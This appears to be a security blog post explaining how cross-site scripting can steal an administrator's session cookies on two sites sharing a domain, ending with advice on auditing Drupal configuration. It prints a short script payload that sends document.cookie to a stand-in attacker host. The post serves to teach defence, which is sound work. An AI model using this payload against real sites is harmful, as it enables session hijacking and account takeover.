Using XSS to steal access

We've talked about Cross Site Scripting (XSS) before, and for good reason, it's a risk far too many sites are vulnerable to. XSS is scary because it runs in the context of the trusted relationship between your browser and a website; XSS can do everything you can do.

XSS cookie theft

Let's look at another example of an XSS exploit: stealing administrative access to a site.

  • An attacker will enter Javascript that steals the visitor's browser cookie
  • An administrator will unknowingly execute this Javascript
  • The administrator's browser will send the cookie to the attacker's website
  • The attacker will use the stolen cookie to use the administrator's access on the site

Hijacking on a cookie is a big deal, but this demo will take it one step further. Because the administrator will also be logged in to another site on the same domain the attacker will receive that cookie as well. It's a two-for-one hack! Please watch this 5 minute video:

Some details

The exploit vector in the video is not standard. The community site was running Open Atrium which uses Markdown as the default Input Format and is not vulnerable to XSS. For demonstration purposes I granted Full HTML to authenticated users which is an insecure practice. Always be aware of what functionality you've granted to untrusted users.

The Javascript used is one that is commonly known. It builds a new img element with the source set to a site controlled by the attacker and it passes the visitors cookie as a request parameter:

 <script>
 new Image().src =
 'http://evil.example.org/steal.php?cookies=' +
  encodeURI(document.cookie);
 </script>

When the above code is executed by your browser it makes a standard request to the URL "http://evil.example.org" passing along whatever cookies are set on the domain the Javascript lives. The attacker needs only then to have a way of monitoring for incoming requests and verifying the granted access.

The unique thing about the demo is that because the administrator was logged into two sites on the same domain the attacker's XSS stole both cookies, allowing the attacker to gain access to a site they (potentially) could not otherwise hack.

Mitigation

The likelihood of an attack of this type being successful is questionable, but the risk should be considered. XSS vulnerabilities are extremely common in web applications, so you should audit your configuration and custom code for adherence to Drupal best practices.

Comments

That was very informative. I need to secure my website.